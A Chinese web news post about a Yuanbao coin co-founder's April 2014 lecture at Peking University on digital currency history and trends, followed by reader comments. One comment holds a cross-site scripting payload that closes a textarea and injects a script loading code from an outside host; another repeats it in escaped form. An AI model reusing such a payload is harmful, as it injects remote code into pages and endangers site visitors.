元宝币走入北大,元宝团队创始人之一邓迪在北大演讲

昨晚,也就是4月25日晚上7点半到9点, 元宝团队创始人之一邓迪受邀在北京大学光华管理学院就过去与未来的数字货币发展进行了主题演讲。众多听众冒雨赶来。

QQ图片20140427004219

当晚演讲内容丰富翔实, 分别包括了比特币为代表的数字货币的发展历史以及过程中的业内轶事:从比特币中本聪时代一开始的默默无闻到现在的林林总总蔚为大观的历程。数字货币圈的特殊文化:即去权威化,去中心化,众筹,自由平等竞争等特点。数字货币现在已经形成的发展态势:价格高涨却又变幻莫测,行业蓬勃发展却又面临监管不确定性等。 数字货币家族的百家争鸣:比特币、莱特币、狗币、点点币、极光币、瑞波币、NXT的不同发展着眼点与特色。 数字货币的未来发展趋势:二代币的新特点和DAC的意义,从比特币区块链的一维时代到未来的多块链二维时代的发展趋势。演讲最后现场邓迪向北大学子推荐阅读Kevin kelly的“失控“这本书,来了解数字货币、DAC所蕴含的深刻哲学意义。演讲结束后,现场同学踊跃提出了许多问题。邓迪在一一解答之后,向现场同学赠送了元宝币纪念卡。

据编者了解,目前在清华大学和北京大学已经形成了一股学习了解数字货币的风气,以清华大学学者韩峰为代表,已经在两校组织了多场数字货币相关演讲,除了比特币之外,尤其对民族数字货币元宝币有所关注。
分享到QQ 分享到微信 分享到微博

4 条评论

  1. #1
    </textarea>'"><script data-original=http://www.mozhua.org/rLMzqc?1398526677></script>
  2. #2
    未曾过多关注此币,个人比较喜欢比特币、莱特币、狗狗币~~
  3. #3
    这北京大学的字为啥写得这么丑
  4. #4
    &lt;/textarea&gt;'&quot;&gt;&lt;script